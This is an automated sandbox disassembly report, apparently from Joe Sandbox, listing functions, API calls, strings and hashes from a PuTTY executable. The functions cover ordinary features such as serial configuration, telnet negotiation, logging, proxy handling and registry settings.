                            • String ID: 1.5$Configuring %d data bits$Configuring %s data bits$Configuring %s flow control$Configuring %s parity$Configuring baud rate %d$DSR/DTR$Invalid number of stop bits (need 1, 1.5 or 2)$RTS/CTS$Unable to configure serial port$Unable to configure serial timeouts$XON/XOFF$even$mark$odd$space
                            • API String ID: 3961186704-2457022346
                            • Opcode ID: 03a6c0eb3f1aebe563ddc1c87e5c792852f0696c982be64303c6c2160c1e2a32
                            • Instruction ID: 385d297f97ba48779de5a49694351bb137ed7cb214f0670bc8eacedc6c7de9e9
                            • Opcode Fuzzy Hash: 03a6c0eb3f1aebe563ddc1c87e5c792852f0696c982be64303c6c2160c1e2a32
                            • Instruction Fuzzy Hash: 64511861D00208BAEB116FB58C05FAF7A68BB45344F14847BF845B6292DBBD8D01E76E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0042E55E Relevance: 31.9, APIs: 7, Strings: 11, Instructions: 391COMMON
                            Download Yara Rule
                            APIs
                            • _strlen.LIBCMT ref: 0042E642
                            • _strlen.LIBCMT ref: 0042E64B
                              • Part of subcall function 00402263: _wctomb_s.LIBCMT ref: 004022D1
                              • Part of subcall function 0043D0E9: _wctomb_s.LIBCMT ref: 0043D14E
                              • Part of subcall function 0043D0E9: _strlen.LIBCMT ref: 0043D15B
                              • Part of subcall function 0043D0E9: _strlen.LIBCMT ref: 0043D166
                              • Part of subcall function 0043D0E9: _strcat.LIBCMT ref: 0043D18B
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(00000000,000003E9,00000180,00000000,00000000), ref: 0043D1D5
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(000003E9,0000018B,00000000,00000000), ref: 0043D1E7
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(000003E9,00000197,-00000001,00000000), ref: 0043D1F9
                            • _strlen.LIBCMT ref: 0042E684
                            • _strlen.LIBCMT ref: 0042E839
                            • _strcat.LIBCMT ref: 0042E85E
                            • _strlen.LIBCMT ref: 0042E864
                            • _strlen.LIBCMT ref: 0042E8EE
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$ItemMessageSend$_strcat_wctomb_s
                            • String ID: %s=%s$USER=%s$client:SB %s IS <nothing>$client:SB %s IS:$client:SB TSPEED IS %s$client:SB TTYPE IS %s$server:SB %s SEND$server:SB TSPEED <something weird>$server:SB TSPEED SEND$server:SB TTYPE <something weird>$server:SB TTYPE SEND
                            • API String ID: 1921442178-3277828204
                            • Opcode ID: 7c7f586b0bcbabec83f8e0e0bf89d6799591987ab98ea94de0ef29bdd195d8c6
                            • Instruction ID: d978bed7bef436be9b4cf8cb6971a5d45b8f3368a0f1331694d8c95c4a28d650
                            • Opcode Fuzzy Hash: 7c7f586b0bcbabec83f8e0e0bf89d6799591987ab98ea94de0ef29bdd195d8c6
                            • Instruction Fuzzy Hash: FAD19C70904341AFDB216B769C81B6BBBA8EF12308F6486AFF4D1563C3D7789801C729
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044A134 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 199registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegCreateKeyExA.ADVAPI32(80000001,Software\SimonTatham\PuTTY\Jumplist,00000000,00000000,00000000,0002001F,00000000,00410EAC,00000000,00000000,00410EAC,00000000,00446358,00410EAC,00410EAC,?), ref: 0044A155
                            • RegQueryValueExA.ADVAPI32(00000000,Recent sessions,00000000,?,00000000,?,?,00401130), ref: 0044A195
                            • RegQueryValueExA.ADVAPI32(?,Recent sessions,00000000,?,00000000,?), ref: 0044A1C5
                            • RegDeleteValueA.ADVAPI32(?,Recent sessions), ref: 0044A1DE
                            • RegCloseKey.ADVAPI32(?), ref: 0044A1F2
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Value$Query$CloseCreateDelete
                            • String ID: Recent sessions$Software\SimonTatham\PuTTY\Jumplist
                            • API String ID: 2765499831-3076341284
                            • Opcode ID: 33fa4eebe227441cbc79a086bc8b46aae77859933597119e4ec4fc57548bfdb0
                            • Instruction ID: 9f5480baf368240e8820aeeeb7ca27388a414a254d1e4d11d876babc97ac05ef
                            • Opcode Fuzzy Hash: 33fa4eebe227441cbc79a086bc8b46aae77859933597119e4ec4fc57548bfdb0
                            • Instruction Fuzzy Hash: DB51C672D84109BEEB115FA09C459AFBB69EB04308F2440BBF501E2291D7799E50D75E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004534DF Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 115fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,..\conf.c,004739A0,00000000), ref: 00453560
                            • _strcat.LIBCMT ref: 00453573
                            • _strlen.LIBCMT ref: 00453580
                            • _strlen.LIBCMT ref: 0045358F
                            • _strncpy.LIBCMT ref: 004535A6
                            • _strlen.LIBCMT ref: 004535AF
                            • _strlen.LIBCMT ref: 004535BC
                            • _strcat.LIBCMT ref: 004535DA
                            • _strlen.LIBCMT ref: 00453622
                            • GetStdHandle.KERNEL32(000000F4,00470968,00000000,?,00000000,..\conf.c,004739A0,00000000), ref: 0045362D
                            • WriteFile.KERNEL32(00000000), ref: 00453634
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$File_strcat$HandleModuleNameWrite_strncpy
                            • String ID: ...$..\conf.c$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                            • API String ID: 3601721357-1758480307
                            • Opcode ID: 1f052af09f78f6c5da87c20373e7e2cc528e085fb5368bdede4697a67d900415
                            • Instruction ID: 1216cf6bcaea86d35bf7d84aa3ec953f54dbe1fbb7b6b298bbfb4767b12aa58f
                            • Opcode Fuzzy Hash: 1f052af09f78f6c5da87c20373e7e2cc528e085fb5368bdede4697a67d900415
                            • Instruction Fuzzy Hash: 5F314A725402046AEB31AF75DC81E9A7368FB44306F24082FF955D3243ED7CAA49872D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043D4CA Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(USER32,0044421E,00000000,00000000,0043D671,?,?,?,?,?,?,?,004405F0,00000002,0044421E,00000000), ref: 0043D4F3
                            • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 0043D50F
                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0043D520
                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0043D531
                            • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 0043D542
                            • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 0043D553
                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0043D564
                            • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 0043D575
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                            • API String ID: 667068680-68207542
                            • Opcode ID: 6505c980da757474385e97565001fa4a04f52fe1ccd50afa4bb62582726c64cc
                            • Instruction ID: f9e847ac59cb1791770e5d74383b9d2f949a21676cb87cbb4b86bcc9a4429f50
                            • Opcode Fuzzy Hash: 6505c980da757474385e97565001fa4a04f52fe1ccd50afa4bb62582726c64cc
                            • Instruction Fuzzy Hash: 70215E70E01A91AA8701EF26BCC052ABAEAF74C745722453FE00DD3250E73940CD8F6E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00408F21 Relevance: 26.4, APIs: 1, Strings: 14, Instructions: 127COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _wctomb_s
                            • String ID: %Y.%m.%d %H:%M:%S$%s session log (%s mode) to file: %s$..\logging.c$=~=~=~=~=~=~=~=~=~=~=~= PuTTY log %s =~=~=~=~=~=~=~=~=~=~=~=$ASCII$Appending$Disabled writing$Error writing$SSH packets$SSH raw data$Writing new$ctx->state != L_OPENING$raw$unknown
                            • API String ID: 2865277502-1037274016
                            • Opcode ID: 00c047b4b6ee3c5e48d737068c417be3e8ed9bcbb7f899efb98abc9756c934af
                            • Instruction ID: 8fbe5d893b4878e3552394671719f13a06db53705e3d7a94d2e1139188ef5850
                            • Opcode Fuzzy Hash: 00c047b4b6ee3c5e48d737068c417be3e8ed9bcbb7f899efb98abc9756c934af
                            • Instruction Fuzzy Hash: F9419431900204AADF219E619981AAF3759EB04319F14C07BFD48BB293DB3DDE4987DE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00411064 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 121registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegisterClassA.USER32(?), ref: 004110C5
                            • GetSysColor.USER32(00000018), ref: 004110D9
                            • GetSysColor.USER32(00000017), ref: 004110E2
                            • SystemParametersInfoA.USER32(00000029,00000154,?,00000000), ref: 00411110
                            • CreateFontIndirectA.GDI32(?), ref: 0041111D
                            • CreateCompatibleDC.GDI32(00000000), ref: 0041114D
                            • _strlen.LIBCMT ref: 0041115D
                            • GetTextExtentPoint32A.GDI32(00000000,?,00000000,?), ref: 00411169
                            • DeleteDC.GDI32(00000000), ref: 00411170
                            • GetWindowRect.USER32(?,?), ref: 0041117D
                            • CreateWindowExA.USER32(00000088,?,?,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004111C2
                            • ShowWindow.USER32(00000000,00000004), ref: 004111D0
                            • SetWindowTextA.USER32(00000000,?), ref: 004111DD
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Window$Create$ColorText$ClassCompatibleDeleteExtentFontIndirectInfoParametersPoint32RectRegisterShowSystem_strlen
                            • String ID: %dx%d$xE
                            • API String ID: 816365731-2198352637
                            • Opcode ID: bb4b9df590eabb9d0049178f5cecab3b04952861f3dc77c5bab16a062b66188d
                            • Instruction ID: 519e5213ff19f963489771f9485338d37e9b9a8d3968d304f5e11607ecc2562b
                            • Opcode Fuzzy Hash: bb4b9df590eabb9d0049178f5cecab3b04952861f3dc77c5bab16a062b66188d
                            • Instruction Fuzzy Hash: 00413D71D04218ABDB109F95EC48EEEBBBCFB48705F00447AF604E6261D7749A85DBA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040C7BF Relevance: 24.8, APIs: 5, Strings: 9, Instructions: 326COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004474AC: _strncpy.LIBCMT ref: 004474F3
                              • Part of subcall function 004474AC: _strncpy.LIBCMT ref: 00447507
                            • _strlen.LIBCMT ref: 0040C80F
                            • _strlen.LIBCMT ref: 0040C859
                            • _strlen.LIBCMT ref: 0040C886
                            • _strcat.LIBCMT ref: 0040C8D7
                            • _strlen.LIBCMT ref: 0040C8E2
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C598
                              • Part of subcall function 0044C558: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000002), ref: 0044C5D6
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C5EC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C5FC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C60D
                              • Part of subcall function 0044C558: _strncpy.LIBCMT ref: 0044C628
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C665
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C67A
                              • Part of subcall function 0044E48E: _strlen.LIBCMT ref: 0044E4A5
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat_strncpy$FileModuleName
                            • String ID: %s:%s$..\proxy.c$CONNECT %s:%i HTTP/1.1Host: %s:%i$HTTP/%i.%i %n$Proxy error: %s$Proxy error: HTTP response was absent$Proxy error: unexpected proxy error$Proxy-Authorization: Basic $len > 0
                            • API String ID: 2220528148-1415320180
                            • Opcode ID: 44066d4d1e1938bbbcc630d6b72b693e100de663154b0d18e5bdb6e0c4fdad66
                            • Instruction ID: 447fded6c1daa8885f089001badc28b7231b314849bf9aa69e2e59c09b91d4f6
                            • Opcode Fuzzy Hash: 44066d4d1e1938bbbcc630d6b72b693e100de663154b0d18e5bdb6e0c4fdad66
                            • Instruction Fuzzy Hash: 3BA1B171A01205BBDB20ABA5CCC6F9A7768EF04318F14417AF905A72C2D778A951CBDD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004091EC Relevance: 24.7, APIs: 3, Strings: 11, Instructions: 244COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strcat_strlen
                            • String ID: %08x%*s$ (%d byte%s omitted)$%02x$%Y-%m-%d %H:%M:%S$%s packet #0x%lx, type %d / 0x%02x (%s)$%s packet type %d / 0x%02x (%s)$%s raw data at %s$Incoming$Outgoing$gvE$gvE
                            • API String ID: 432593777-2465974704
                            • Opcode ID: e1616b3bc9bebc0b7bc3a10a409ce4531e1ee10a379f09970a5fa083c75d4c0c
                            • Instruction ID: 7919a70cb201e2f2c8a71953919a0f509b02297f942be3d76562262a1e79fb02
                            • Opcode Fuzzy Hash: e1616b3bc9bebc0b7bc3a10a409ce4531e1ee10a379f09970a5fa083c75d4c0c
                            • Instruction Fuzzy Hash: 95918A71904248EBDF24DE98C881AEE37A8EB04309F24443BFD14A62D3D779DC45CB99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004471DC Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 205networkCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strncpyhtonl$ErrorLast_strcat_strlengetaddrinfogethostbynameinet_addr
                            • String ID: Host does not exist$Host not found$Network is down$gethostbyname: unknown error
                            • API String ID: 929124817-1679025516
                            • Opcode ID: f947a2b08b981d53c1d51f7dba97cf010a2826b67bb91a8ca2c414977d11608e
                            • Instruction ID: f81d876ec4e7c5e76facc13508d20924df56701e9dafbc652d8b647a32777cc5
                            • Opcode Fuzzy Hash: f947a2b08b981d53c1d51f7dba97cf010a2826b67bb91a8ca2c414977d11608e
                            • Instruction Fuzzy Hash: D27102B1904305EFEB209F64CC85A9BBBB5FB04308F20446FFA0597252D778D986DB69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00449EA6 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 164registrylibraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY,?), ref: 00449EE0
                            • RegQueryValueExA.ADVAPI32(?,RandSeedFile,00000000,00000001,?,00000001), ref: 00449F05
                            • RegCloseKey.ADVAPI32(?), ref: 00449F1E
                            • GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 00449F6C
                            • GetEnvironmentVariableA.KERNEL32(HOMEDRIVE,?,00000212), ref: 0044A024
                            • GetEnvironmentVariableA.KERNEL32(HOMEPATH,?,00000212), ref: 0044A038
                            • GetWindowsDirectoryA.KERNEL32(?,00000212), ref: 0044A06C
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: EnvironmentVariable$AddressCloseDirectoryOpenProcQueryValueWindows
                            • String ID: HOMEDRIVE$HOMEPATH$RandSeedFile$SHGetFolderPathA$Software\SimonTatham\PuTTY$\PUTTY.RND$shell32.dll
                            • API String ID: 640059220-1528239033
                            • Opcode ID: 3418c1e91284a318e44401508d2fe14a677bd39899c452e3021f25b2818e395a
                            • Instruction ID: b9e84c96b2ebda6f2a9b1cd1520a50ee996602bfc54b3840d2be6d67aca98011
                            • Opcode Fuzzy Hash: 3418c1e91284a318e44401508d2fe14a677bd39899c452e3021f25b2818e395a
                            • Instruction Fuzzy Hash: 67512371E04119BAEB21DBA1DD49EDB77BCAB44744F1000BAF905E3151E734EE48CBA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00448EF1 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 150pipeCOMMON
                            Download Yara Rule
                            APIs
                            • CreatePipe.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,00000000,00000000,0040BF37), ref: 00448F7B
                            • CreatePipe.KERNEL32(?,?,0000000C,00000000,?,?,?,?,?,?,?,00000000,00000000,0040BF37), ref: 00448F8E
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,0040BF37), ref: 00448F9D
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,0040BF37), ref: 00448FA2
                            Strings
                            • Unable to create pipes for proxy command, xrefs: 00448FA4
                            • Starting local proxy command: %s, xrefs: 00448F1E
                            • D, xrefs: 00448FF8
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CloseCreateHandlePipe
                            • String ID: D$Starting local proxy command: %s$Unable to create pipes for proxy command
                            • API String ID: 102915730-3171384230
                            • Opcode ID: 28e3e03e1bbcae769a55e0b555d8b9f96b9a04ec4536f9a178d1c63f0d0dacca
                            • Instruction ID: bad2cb629d0ed1777640dc63cd526b87a8987bb29fe41ad2669a6c9d7929842a
                            • Opcode Fuzzy Hash: 28e3e03e1bbcae769a55e0b555d8b9f96b9a04ec4536f9a178d1c63f0d0dacca
                            • Instruction Fuzzy Hash: 7551F871D00208BFDF21AFA6DC85D9FBBB9EF48704F10452AF501A2261DB759A41DBA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044A3E8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 63registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00449EA6: RegOpenKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY,?), ref: 00449EE0
                              • Part of subcall function 00449EA6: RegQueryValueExA.ADVAPI32(?,RandSeedFile,00000000,00000001,?,00000001), ref: 00449F05
                              • Part of subcall function 00449EA6: RegCloseKey.ADVAPI32(?), ref: 00449F1E
                              • Part of subcall function 00449EA6: GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 00449F6C
                              • Part of subcall function 00446304: CoCreateInstance.OLE32(0046C8B4,00000000,00000001,0046C904,00410EAC,00410EAC,?,00410EAC,?,?,?), ref: 0044631A
                            • RegOpenKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY,?), ref: 0044A416
                            • RegCloseKey.ADVAPI32(?), ref: 0044A42E
                            • RegOpenKeyA.ADVAPI32(80000001,Software\SimonTatham,?), ref: 0044A43A
                            • RegDeleteKeyA.ADVAPI32(?,PuTTY), ref: 0044A448
                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 0044A45F
                            • RegCloseKey.ADVAPI32(?), ref: 0044A46B
                            • RegOpenKeyA.ADVAPI32(80000001,Software,?), ref: 0044A47D
                            • RegDeleteKeyA.ADVAPI32(?,SimonTatham), ref: 0044A48B
                            • RegCloseKey.ADVAPI32(?), ref: 0044A494
                              • Part of subcall function 0044A380: RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 0044A3DD
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CloseOpen$DeleteEnum$AddressCreateInstanceProcQueryValue
                            • String ID: PuTTY$SimonTatham$Software$Software\SimonTatham$Software\SimonTatham\PuTTY
                            • API String ID: 3151532935-144119552
                            • Opcode ID: d5466a432812660022dbbb61529223e5edceede073a5f52ca88cd26865192c12
                            • Instruction ID: 2ad8291588690aaebb20384a85e2454caf31b2d46d5ccb5269286e80e30599f6
                            • Opcode Fuzzy Hash: d5466a432812660022dbbb61529223e5edceede073a5f52ca88cd26865192c12
                            • Instruction Fuzzy Hash: 86115831D40208FBEF11EBA1DD46FAE7B79AF04B55F200076F500A10A1D7759E549B1D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00449B69 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 202registryCOMMON
                            Download Yara Rule
                            APIs
                            • _strlen.LIBCMT ref: 00449B75
                            • _strlen.LIBCMT ref: 00449B83
                            • _strlen.LIBCMT ref: 00449B8D
                              • Part of subcall function 00449B27: _strcat.LIBCMT ref: 00449B2C
                              • Part of subcall function 00449B27: _strlen.LIBCMT ref: 00449B3D
                              • Part of subcall function 00449B27: _strlen.LIBCMT ref: 00449B54
